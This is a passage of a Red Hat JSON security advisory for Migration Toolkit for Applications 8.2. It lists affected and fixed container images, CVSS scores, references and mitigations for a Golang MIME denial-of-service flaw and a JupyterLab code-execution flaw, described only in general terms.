"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2484204"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Golang MIME (Multipurpose Internet Mail Extensions) package. A remote attacker could exploit this vulnerability by sending a maliciously-crafted MIME header containing many invalid encoded-words. This could lead to excessive CPU consumption, resulting in a Denial of Service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "mime: golang: Golang MIME: Denial of Service via maliciously-crafted MIME header",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is rated as an Important severity flaw. A remote attacker could trigger a Denial of Service by sending a crafted MIME header with numerous invalid encoded-words to an application utilizing the affected Golang MIME package. This could lead to excessive CPU consumption on the system processing the malformed header, impacting service availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42504"
},
{
"category": "external",
"summary": "RHBZ#2484204",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484204"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42504",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42504"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42504",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42504"
},
{
"category": "external",
"summary": "https://go.dev/cl/774481",
"url": "https://go.dev/cl/774481"
},
{
"category": "external",
"summary": "https://go.dev/issue/79217",
"url": "https://go.dev/issue/79217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/tKs3rmcBcKw",
"url": "https://groups.google.com/g/golang-announce/c/tKs3rmcBcKw"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-5038",
"url": "https://pkg.go.dev/vuln/GO-2026-5038"
}
],
"release_date": "2026-06-02T22:01:37.219000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "To mitigate this issue, restrict network access to services that process MIME headers from untrusted sources. Implement input validation and sanitization for all incoming data, especially MIME headers, to prevent maliciously crafted content from being processed by applications utilizing the vulnerable Golang MIME package.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "mime: golang: Golang MIME: Denial of Service via maliciously-crafted MIME header"
},
{
"cve": "CVE-2026-42557",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-05-13T16:02:57.063403+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477086"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in jupyterlab. This vulnerability allows a remote attacker to achieve arbitrary code execution by presenting a user with a specially crafted notebook containing a deceptive button in its pre-saved HTML cell output. When the user clicks this button, the CommandLinker component executes arbitrary JupyterLab commands without sufficient validation, leading to the execution of unauthorized code.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jupyterlab: JupyterLab: Arbitrary code execution via deceptive button in HTML output",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important vulnerability in JupyterLab allows arbitrary code execution through a deceptive button embedded in a notebook\u0027s HTML output. When a user clicks this specially crafted button, the CommandLinker component executes unauthorized JupyterLab commands, bypassing security validation. This can lead to compromise of the user\u0027s environment, including data loss or denial of service, particularly in Red Hat products utilizing JupyterLab such as Migration Toolkit for Applications and Red Hat OpenShift AI. Exploitation requires user interaction.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
